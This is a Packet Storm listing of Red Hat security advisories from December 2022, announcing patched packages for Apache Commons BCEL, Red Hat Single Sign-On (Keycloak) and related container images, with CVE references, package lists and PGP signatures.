Red Hat Security Advisory 2022-8961-01

Red Hat Security Advisory 2022-8959-01 - The Byte Code Engineering Library is intended to give users a convenient way to analyze, create, and manipulate Java class files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: rh-maven36-bcel security update  
Advisory ID:       RHSA-2022:8959-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8959  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-42920  
====================================================================  
1. Summary:

An update for rh-maven36-bcel is now available for Red Hat Software  
Collections.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch

3. Description:

The Byte Code Engineering Library (Apache Commons BCEL) is intended to give  
users a convenient way to analyze, create, and manipulate (binary) Java  
class files (those ending with .class).

Security Fix(es):

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-maven36-bcel-6.3.1-2.3.el7.src.rpm

noarch:  
rh-maven36-bcel-6.3.1-2.3.el7.noarch.rpm  
rh-maven36-bcel-javadoc-6.3.1-2.3.el7.noarch.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-maven36-bcel-6.3.1-2.3.el7.src.rpm

noarch:  
rh-maven36-bcel-6.3.1-2.3.el7.noarch.rpm  
rh-maven36-bcel-javadoc-6.3.1-2.3.el7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipktzjgjWX9erEAQhnTQ//XLvsdlV/NZd4o/fceImEOfM6rv/Xz9OH  
r/8TywiqGBMf0MZgtwr/dxg9jrV3DG8jhSIO36CsBEh5pplw8dEtgwA39aNSN5KA  
va+PTC1tw1WBL26iQB99HH35vNGojubadHXLyGrB4sb11Gr/lDUi93AAkD85YCvp  
gIx2NKIijqIbWf7XTCZTVxSKGq1feFcY+RpqfM0W/nGw7ZoBc+MVBrvMPIuKTeZY  
vnYt4lczddxbmz2SJZ+kOzo3ulOkTDn8hH33LwnCA/niPiJH0OWbThD5Eeu3VdUg  
npuBN6dzoU+dF5z5Zl2qh2aXg7FtzFFtqjy+GZ29JUJOWocYHTFWEaPUIBuHvetf  
bahHJJ/sl+JIXAvnkYSQAAAJYoLifyR8OIkUItT8J99Yz8c0QKn3X4o2sl2mZvRk  
0UuEOj93pXEs7sy0gtp+kn9cLhxPpEhL/wB6PL896JEzLrQ8adYPWidTwVDGkcZj  
Z/RC6Fu2qCWS0ta5pbdl2SubG2ndKolX8r5yhvNy2FROBnuMJby+mI4qEoVh2P+e  
FjwUjzW2UJq+/vhQ0deZ4DDAeCs9Cv/tIwKNEeTF9PdrvHNyFbN4sWzsfN0RI5O2  
w2rmfQJk1DrPOLShpSIoDF8/yKDYrlUIvJ2yzmfJy9h5sQzwCYpyPPDMPmE1dMwa  
HZK+lpuikNk=lFDR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8959-01

Red Hat Security Advisory 2022-8965-01 - Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. This release of Red Hat Single Sign-On 7.6.1 serves as a replacement for Red Hat Single Sign-On 7.6.1. Issues addressed include a traversal vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Single Sign-On 7.6.1 security update  
Advisory ID:       RHSA-2022:8965-01  
Product:           Red Hat Single Sign-On  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8965  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-3782 CVE-2022-3916  
====================================================================  
1. Summary:

An update is now available for Red Hat Single Sign-On 7.6 from the Customer  
Portal.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak  
project, that provides authentication and standards-based single sign-on  
capabilities for web and mobile applications.

This release of Red Hat Single Sign-On 7.6.1 serves as a replacement for  
Red Hat Single Sign-On 7.6.1, and includes the following security fixes.

Security Fix(es):

* keycloak: path traversal via double URL encoding (CVE-2022-3782)

* keycloak: Session takeover with OIDC offline refreshtokens  
(CVE-2022-3916)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link (you must  
log in to download the update).

4. Bugs fixed (https://bugzilla.redhat.com/):

2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding  
2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens

5. JIRA issues fixed (https://issues.jboss.org/):

CIAM-4411 - Build one-off patch

6. References:

https://access.redhat.com/security/cve/CVE-2022-3782  
https://access.redhat.com/security/cve/CVE-2022-3916  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.rhsso&downloadType=securityPatches&version=7.6

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipmtzjgjWX9erEAQhu0A/8CC5j7AvyOc2vPpHVmT0KXrJVF1KGXsbB  
svAHX7hJHpp1aqCZReiC+b2v4TbCnVEt+k4od0XjgGrC5Wxk9gYz/crJ68m6qUIM  
N3z56OHqHZsNL4HZxIhw6dn4N7OisTidkHXGTZK3Y0HuVB+hGWy498OXsF/4kz7l  
SiJGuai0CtcF/g/u9fSYxuQUyQvuFDCDLrOXvaloBzhYgjLj43eoWBxlJ35br2U2  
blsQdohT7t93LyT1g5TxE8Vc4iF/4/Tf6EjrmGK635XSAG5GzfHav0CnS9GU49Ju  
3qA5Vvp9lJgEvq6kD4w0hyCkJ78aDK8ljK6NGZeyRRpXiAYJchvvXVJcKw2D1Fy2  
FgqrEvWQqmiCw/z7Q9POXhOsz1xNwdy2bFjZtdOvrERSv1Ffn2vvQlInxcdq/WR2  
AZ7vFV5AdLgPIwWosRiuOZXWl5smF5EsyyhsMdGzmiyZhhsEW1wAZ+8CUN3HEjxK  
8QoNuLsgmOuDw4ga+NrZj8487m96RO/Tj1yqJ9eGLA2EFSOhJCunxP6atRUBeK1m  
diU0kJ5o3QnrzstmvYvNFJqS29aKAyiG8rOd2Il59BeHYRfd7tUiDAsRE5SQqh0h  
6neuz4eqS19jrSCR4HgHsDRfbUcRQi/Rpuj1F9DM94in5TrQ0fUvuof2/xCZg1Q+  
kb9RAWpgtBs=ov2Q  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8965-01

Red Hat Security Advisory 2022-8940-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include an out of bounds write vulnerability.

Red Hat Security Advisory 2022-8940-01

Red Hat Security Advisory 2022-8963-01 - Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. This release of Red Hat Single Sign-On 7.6.1 on RHEL 9 serves as a replacement for Red Hat Single Sign-On 7.6.1, and includes the security fixes listed below. Issues addressed include a traversal vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Single Sign-On 7.6.1 security update on RHEL 9  
Advisory ID:       RHSA-2022:8963-01  
Product:           Red Hat Single Sign-On  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8963  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-3782 CVE-2022-3916  
====================================================================  
1. Summary:

New Red Hat Single Sign-On 7.6.1 packages are now available for Red Hat  
Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Single Sign-On 7.6 for RHEL 9 - noarch

3. Description:

Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak  
project, that provides authentication and standards-based single sign-on  
capabilities for web and mobile applications.

This release of Red Hat Single Sign-On 7.6.1 on RHEL 9 serves as a  
replacement for Red Hat Single Sign-On 7.6.1, and includes the security  
fixes listed below.

Security Fix(es):

* keycloak: path traversal via double URL encoding (CVE-2022-3782)

* keycloak: Session takeover with OIDC offline refreshtokens  
(CVE-2022-3916)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding  
2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens

6. JIRA issues fixed (https://issues.jboss.org/):

CIAM-4414 - Build RPMs for this patch

7. Package List:

Red Hat Single Sign-On 7.6 for RHEL 9:

Source:  
rh-sso7-keycloak-18.0.3-1.redhat_00002.1.el9sso.src.rpm

noarch:  
rh-sso7-keycloak-18.0.3-1.redhat_00002.1.el9sso.noarch.rpm  
rh-sso7-keycloak-server-18.0.3-1.redhat_00002.1.el9sso.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2022-3782  
https://access.redhat.com/security/cve/CVE-2022-3916  
https://access.redhat.com/security/updates/classification/#important

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipndzjgjWX9erEAQhVcxAAnTGHyVcLWPvYT8iwc9H8oDFxvLGgHmzc  
dWM5kJDBs6in9LmpRfuK+e2+ImTB51tJevuhhlWK352/sNaNLUqRDVwh3lC+5j/I  
Wg9OVsLlSDrlaB8XPUP2W7yDa8ZHc4SMb6t4h/h7xKc4ylLAJNM2K/d/wiisAK3n  
154VOxiaQJjfSOk1EPJipg6oe8iT0ytStcWqxstpvVQj8oWEvyghzeZyQbcy/+Ar  
9L7lc43jCkZWq8LVRznX4SwooqJvsARuvw9M54dvaWAkdr4lme07BIAY2AEIk1k3  
fB3to4RtSb2I6H/PsJn2uZ4r0aeigWMTEG4M+8RluAjjglVtBISjwzQ4WAahwL7o  
2Gjoxpoe81WFSLAqwvmNdqQplJSMVajymKweFVQBZih0VGYTCGR/LRCg57Fjh3UZ  
o96jAUIjR7DtXrU0PtuXvDyi4L8dNFRHh4oXzFVGH+0VyT/QSOonEJM2qcDcXFjv  
OD19J3457M+qTrJkqeeuFY5UhyfxzCD5fcDzOlt4YK95ptx+0dV4dlbDq3ECGbw9  
jWX1QGKnXFjsljZLCacT1RoS6wwWnDg8ZTIDZdm1FKyEA9wlqhuJMPgKFpTri7y0  
YYO14rCXVuKkoHBVB+sgpup4w2B47v897DtGw+J51hWBdmYg/miYiEUbod+Z3V8t  
7C6RUvKvSmo=XpnE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8963-01

Red Hat Security Advisory 2022-8964-01 - The rh-sso-7/sso76-openshift-rhel8 container image and rh-sso-7/sso7-rhel8-operator operator has been updated for RHEL-8 based Middleware Containers to address the following security issues. Issues addressed include a traversal vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: updated rh-sso-7/sso76-openshift-rhel8 container and operator related images  
Advisory ID:       RHSA-2022:8964-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8964  
Issue date:        2022-12-13  
CVE Names:         CVE-2016-3709 CVE-2022-1304 CVE-2022-3782  
                   CVE-2022-3916 CVE-2022-22624 CVE-2022-22628  
                   CVE-2022-22629 CVE-2022-22662 CVE-2022-26700  
                   CVE-2022-26709 CVE-2022-26710 CVE-2022-26716  
                   CVE-2022-26717 CVE-2022-26719 CVE-2022-27404  
                   CVE-2022-27405 CVE-2022-27406 CVE-2022-30293  
                   CVE-2022-37434 CVE-2022-42898  
====================================================================  
1. Summary:

Updated rh-sso-7/sso76-openshift-rhel8 container image and  
rh-sso-7/sso7-rhel8-operator-bundle image is now available for RHEL-8 based  
Middleware Containers.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

The rh-sso-7/sso76-openshift-rhel8 container image and  
rh-sso-7/sso7-rhel8-operator operator has been updated for RHEL-8 based  
Middleware Containers to address the following security issues.

Security Fix(es):

* keycloak: path traversal via double URL encoding (CVE-2022-3782)

* keycloak: Session takeover with OIDC offline refreshtokens  
(CVE-2022-3916)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Users of rh-sso-7/sso76-openshift-rhel8 container images and  
rh-sso-7/sso7-rhel8-operator operator are advised to upgrade to these  
updated images, which contain backported patches to correct these security  
issues, fix these bugs and add these enhancements. Users of these images  
are also encouraged to rebuild all container images that depend on these  
images.

You can find images updated by this advisory in Red Hat Container Catalog  
(see References).

3. Solution:

The RHEL-8 based Middleware Containers container image provided by this  
update can be downloaded from the Red Hat Container Registry at  
registry.access.redhat.com. Installation instructions for your platform are  
available at Red Hat Container Catalog (see References).

Dockerfiles and scripts should be amended either to refer to this new image  
specifically, or to the latest image generally.

4. Bugs fixed (https://bugzilla.redhat.com/):

2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding  
2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens

5. JIRA issues fixed (https://issues.jboss.org/):

CIAM-4412 - Build new OCP image for rh-sso-7/sso76-openshift-rhel8  
CIAM-4413 - Generate new operator bundle image for this patch

6. References:

https://access.redhat.com/security/cve/CVE-2016-3709  
https://access.redhat.com/security/cve/CVE-2022-1304  
https://access.redhat.com/security/cve/CVE-2022-3782  
https://access.redhat.com/security/cve/CVE-2022-3916  
https://access.redhat.com/security/cve/CVE-2022-22624  
https://access.redhat.com/security/cve/CVE-2022-22628  
https://access.redhat.com/security/cve/CVE-2022-22629  
https://access.redhat.com/security/cve/CVE-2022-22662  
https://access.redhat.com/security/cve/CVE-2022-26700  
https://access.redhat.com/security/cve/CVE-2022-26709  
https://access.redhat.com/security/cve/CVE-2022-26710  
https://access.redhat.com/security/cve/CVE-2022-26716  
https://access.redhat.com/security/cve/CVE-2022-26717  
https://access.redhat.com/security/cve/CVE-2022-26719  
https://access.redhat.com/security/cve/CVE-2022-27404  
https://access.redhat.com/security/cve/CVE-2022-27405  
https://access.redhat.com/security/cve/CVE-2022-27406  
https://access.redhat.com/security/cve/CVE-2022-30293  
https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/cve/CVE-2022-42898  
https://catalog.redhat.com/software/containers/registry/registry.access.redhat.com/repository/rh-sso-7/sso76-openshift-rhel8  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ipn9zjgjWX9erEAQjCiRAAi5ZA/JuXoVbFoEvce4VnkiwYj3R9YGSF  
xcRYfIxIULSq4rRxjOKZroVyzZUp4HCYHxiNVjSOfreCVCUOrdSEipedwuJIIqvx  
SbYkdr9H0nww4Sne6rCOJZxVtgGMwMFBCVvQqeqRQAJH6qLpkuHnIda1wt/9HKbV  
6kgg4BeqmYVReLO4f0QEXaBl6xuUWTAh8hr4B2fiKJ19r5On05Ob+rXUnpfzqu2p  
tA204sSB4y5sL6cNxGHXzxDcazRdYyLJj6KkN+3ydLANjFruU5pq9nxZoqKRlT7p  
CDYGoEguuheLNyDkIXjVngHs7mtKCS6da2jqcJC3fh3N/+hhepeGXk642jyF8u1o  
RMr6M8HPNsVL4Vdg9d3CZtzfBkDFXSHKD5O6Mi6SkCTKWrY/K6UG1JQtcIpDOTzd  
PWKE1WkqvpyA3Ie8DRUI0ztEDdRhazPCd+03HYKEVWoD/a+Q5NqgCaBViSuLLxpU  
9FIq9OPwaxE4wzEjfuyOBNY183f6eTbAA7RE4ynfitiQiXMUKAhO3jLkFUgsogkp  
y/N2xyYR/SjIKyRH8zkQXc6+FD5gDX+8exWYnqD+dd8ucmK/D49nwoprXca7X4fH  
1cBIpjuFF1pXQTwnygAh7Nyd40bIjEOB81YjoiroOhoLzfsBfBywLfon14bElgu/  
c6KgATBEAcE=oocq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm